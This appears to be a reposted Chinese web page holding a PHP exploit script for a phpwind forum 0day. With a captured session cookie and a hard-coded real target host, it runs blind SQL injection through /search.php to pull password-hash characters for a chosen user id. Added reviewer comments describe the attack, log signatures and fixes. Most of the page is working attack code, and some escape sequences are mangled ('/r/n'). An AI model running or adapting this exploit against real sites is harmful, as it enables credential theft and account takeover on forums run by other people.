
    从网上搜到的phpwind 0day的代码

    2018-10-04 14:38:15 次阅读 稿源:互联网

    <!--
      Presentation wrapper for the PHP script that follows: a page title, inline
      CSS and two centred banner lines. It contains no form, script or input
      element; all request logic is in the PHP block below.
      NOTE(review): <head> is never closed and there is no <body> element, and
      most CSS values are written as quoted strings (e.g. font-size: "12px"),
      which is not valid CSS for those properties.
    -->
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title>Codz By 剑心</title>
    <style type="text/css">
    body,td {
    font-family: "Tahoma";
    font-size: "12px";
    line-height: "150%";
    }
    .smlfont {
    font-family: "Tahoma";
    font-size: "11px";
    }
    .INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
    }
    .redfont {
    COLOR: "#A60000";
    }
    a:link,a:visited,a:active {
    color: "#000000";
    text-decoration: underline;
    }
    a:hover {
    color: "#465584";
    text-decoration: none;
    }
    .top {BACKGROUND-COLOR: "#CCCCCC"}
    .firstalt {BACKGROUND-COLOR: "#EFEFEF"}
    .secondalt {BACKGROUND-COLOR: "#F5F5F5"}
    </style>
    <center>The Exploiet Of The All Phpwind Version</center>
    <center> BY 剑心</center>
    <br>
    <br>
    <br>
    <br>
    <br>

    <?php
    // Reviewer summary (defensive reading of this listing).
    // The script sends repeated POST requests to $path on $server through send()
    // and treats the presence or absence of the $mask text in each response as a
    // one-bit answer to a SQL condition appended to the `uids` form field. That is
    // boolean-based blind SQL injection; the answers are used to read characters
    // of the `password` column of the "<prefix>members" table for a single uid.
    // The server-side code is not shown on this page. For the application owner
    // the relevant controls are: force every element of `uids` to an integer (or
    // bind it as a query parameter) before it reaches SQL, and never return
    // database error text to the client.
    //
    // Request traits visible in this listing that can be searched for in WAF or
    // request-body logs: POST to /search.php with step=3; a pwuser value made of
    // 32 hex characters followed by "loveshell"; the constant pairs
    // 184288238=kkkk and 276791066=jjjjjj; a uids value that starts with "-1)"
    // and contains URL-encoded "union select" and "ord(mid(password"; many such
    // requests in a row from one client with the fixed User-Agent below.

    // Remove PHP's execution time limit; the loop below issues many sequential requests.
    ini_set("max_execution_time",0);
    // 7 = E_ERROR | E_WARNING | E_PARSE; notices are not reported.
    error_reporting(7);

    // Hard-coded request parameters: path, a third-party hostname, a captured
    // session cookie and a fixed User-Agent.
    // NOTE(review): the cookie carries session and auth values (PHPSESSID, auth);
    // for the site owner these are credentials to invalidate.
    $path="/search.php";
    $server='bbs.ccidnet.com';
    $cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

    $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

    // Account id whose password field is read. Defaults to 2 and is overridden by
    // this script's own `uid` query parameter when that is truthy; the value is
    // not validated before it is placed in the SQL text sent below.
    $uid=2;
    $_GET['uid']&&$uid=$_GET['uid'];
    // Value returned by the injected UNION SELECT.
    // NOTE(review): presumably an existing thread id, so that a true condition
    // yields a search hit — confirm against the application.
    $tid=539264;

    // Response text meaning "no matching content found"; its absence is read as
    // "condition true" by the probes below.
    $mask='没有查找匹配的内容';
    // Number of requests sent; incremented inside send().
    $count=0;

    // Dead branch as listed: $testing is only assigned in the two commented-out
    // lines. It matches on the X-Powered-By response header and prints the capture.
    //$testing=1;
    //$testing=$_GET['test'];
    if($testing) {preg_match('/X-Powered-By: php//(.+)/r/n/ie',send(""),$php);echo$php[1];die();}

    // $debug is read by send(); it stays unset unless this line is enabled.
    //$debug=1;

    // First request. $sql has not been assigned yet, so uids is just "-1"
    // followed by "/*j". $temp only makes the pwuser value differ per request.
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
    $response=send($cmd);

    // Capture whatever sits between "FROM " and "threads" in the response and use
    // it as the table prefix.
    // NOTE(review): this apparently depends on the server echoing the failing SQL
    // statement back to the client — a reason to disable verbose database errors.
    preg_match('/FROM (.+)threads/ie',$response,$match);

    $pre=$match[1];
    // Three outcomes: prefix found (printed); response contains the login button
    // text (script stops, session not accepted); anything else (script stops).
    if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
    else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
    else {echo "Maybe It is not vul!<br>";die();}

    echo "Try to Get the uid=$uid 's Password:<font color=red>";
    // Every recovered character is also appended to log.txt in the working directory.
    $log=fopen('log.txt','a+');

    // 16 iterations; $sub runs from 9 to 24, i.e. character positions 9..24 of
    // the password value.
    // NOTE(review): presumably the stored value is a 32-character hex digest and
    // only this slice is read — confirm against the application's schema.
    for($i=0;$i<16;$i++)
    {

    // $type is assigned here and below but never read in the visible code.
    $type=0;
    $sub=$i+9;
    // The first $temp value is overwritten two lines later before it is used.
    $temp=md5(rand(1,100)+microtime());
    // Range probe: is the character at $sub a digit (ASCII 48..57)?
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    // $mask absent from the response => the range condition held.
    if(!strpos(send($cmd),$mask)) {

    $type=0;
    // Equality probe for each digit in turn; the first value whose response
    // lacks $mask is printed and logged.
    for($m=48;$m<=57;$m++){
    $temp=md5(rand(1,100)+microtime());
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {

    echo chr($m);
    fputs($log,chr($m));
    break;
    }
    // Redundant: this is already the last statement of the inner loop body.
    continue;
    }
    // Move to the next character position, whether or not a digit was matched.
    continue;
    }

    // Same two-stage probe for lowercase letters (ASCII 97..122).
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
    $sql=urlencode($sql);
    $temp=md5(rand(1,10000)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {

    $type=1;
    for($m=97;$m<=122;$m++){
    $temp=md5(rand(1,100)+microtime());
    $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
    $sql=urlencode($sql);
    $temp=md5(rand(1,100)+microtime());
    $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
    if(!strpos(send($cmd),$mask)) {
    echo chr($m);
    fputs($log,chr($m));
    break;
    }
    continue;
    }
    continue;
    }

    // Neither range probe held for this position: report and stop. The log file
    // handle is not closed on this path.
    echo "error!<br>";
    die("Shit!May be the data you post is Not valid!Try anthor UID/r/n");

    }
    fclose($log);
    // $count was incremented once per send() call.
    echo "<br>Done!We Post $count times!<br>";

    /**
     * Sends one POST request with $cmd as the form body and returns the response
     * text wrapped in "<pre>" ... "</pre>".
     *
     * Reads $path, $server, $cookie, $useragent and $debug from global scope and
     * increments the global $count on every call.
     *
     * @param string $cmd Form body, already assembled (and URL-encoded where
     *                    needed) by the caller.
     * @return string "<pre>" + everything read from the socket + "</pre>".
     */
    function send($cmd)
    {
    global $path,$server,$cookie,$count,$useragent,$debug;

    // Request counter reported at the end of the script.
    $count=$count+1;
    // Request text is built by hand: request line, fixed headers, the captured
    // Cookie header, then the body. Content-length is the byte length of $cmd.
    $message = "POST ".$path."? HTTP/1.1/r/n";
    $message .= "Accept: */*/r/n";
    $message .= "Accept-Language: zh-cn/r/n";
    $message .= "Referer: http://".$server.$path."/r/n";
    $message .= "Content-Type: application/x-www-form-urlencoded/r/n";
    $message .= "User-Agent: ".$useragent."/r/n";
    $message .= "Host: ".$server."/r/n";
    $message .= "Content-length: ".strlen($cmd)."/r/n";
    $message .= "Connection: Keep-Alive/r/n";
    $message .= "Cookie: ".$cookie."/r/n";
    $message .= "/r/n";
    $message .= $cmd."/r/n";

    // Plain TCP connection to port 80 (no TLS, no explicit timeout). The result
    // of fsockopen() is not checked before fputs(); $fd is only tested in the
    // loop condition below.
    $fd = fsockopen( $server, 80 );
    fputs($fd,$message);
    $resp = "<pre>";
    // Read in 1024-byte chunks until end of stream.
    while($fd&&!feof($fd)) {
    $resp .= fread($fd,1024);
    }
    fclose($fd);
    $resp .="</pre>";
    // With $debug set, the body and the raw response are echoed without HTML escaping.
    if($debug) {echo $cmd;echo $resp;}
    return $resp;
    }
    ?>
